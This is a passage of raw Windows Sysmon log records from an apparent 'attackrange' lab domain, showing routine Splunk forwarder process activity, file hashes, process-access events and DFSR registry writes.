Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.233{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5AD640565C263DE236F2B2B58EEB313,SHA256=32F40BC43C4CEA6101F4A3ADDE826717D50164EEEFCC4CC3409845713D6CDF4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:51.232{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EEEE864BF3E251A4C7EE1FF5B035DB9,SHA256=6982675ACB408A9A8819C0AFC82D8B192159777C8B7196080A398A058D8CDB60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.181{466BC892-F50E-60EB-467D-00000000CF01}81564920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74B2876505A575868ECEFDFE8C797851,SHA256=BC6F3F0EE540FDBE09B1FF809A1BC98F903AA8BBFBDAA6D22041DB635A589316,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807854Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:52.558{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=442998CE633F14D1D07280ED1292F116,SHA256=74315C968983D0861BA7C05D7B3D71DA94B39889CE5C8144BD1A95FD6EA4C2F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.914{466BC892-F510-60EB-497D-00000000CF01}47326524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.651{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F510-60EB-497D-00000000CF01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.651{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F510-60EB-497D-00000000CF01}4732C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.651{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F510-60EB-497D-00000000CF01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:52.651{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.651{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:52.651{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.651{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.615{466BC892-F510-60EB-497D-00000000CF01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry 
monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.467{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5AD640565C263DE236F2B2B58EEB313,SHA256=32F40BC43C4CEA6101F4A3ADDE826717D50164EEEFCC4CC3409845713D6CDF4B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001049380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:52.335{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x80000000000000001049379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:52.333{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Config SourceDWORD (0x00000001) 13241300x80000000000000001049378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
07:53:52.333{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_6C48E9CC-B771-47F3-A036-36AE114D8798.XML 10341000x80000000000000001049377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.114{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F510-60EB-487D-00000000CF01}9312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.114{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:52.114{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.114{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:52.114{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.114{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F510-60EB-487D-00000000CF01}9312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.114{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F510-60EB-487D-00000000CF01}9312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.099{466BC892-F510-60EB-487D-00000000CF01}9312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.051{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=811ADA68445B55A80A4C55F84B4FF8E3,SHA256=F5DA81B2B7E1BC02BABF1C7295BAEC56AAB641F65B8921BEAA57B02C4B26D05D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807855Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:53.620{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45A46CB394E4DA507714F1BD0C77F8E7,SHA256=7F120626FADAAB09E9E2CD717FC0D4BC4A694B1C58E7C4769F9BB31BB2AAAFAD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.884{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F511-60EB-4B7D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.867{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.867{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F511-60EB-4B7D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.867{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:53.867{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 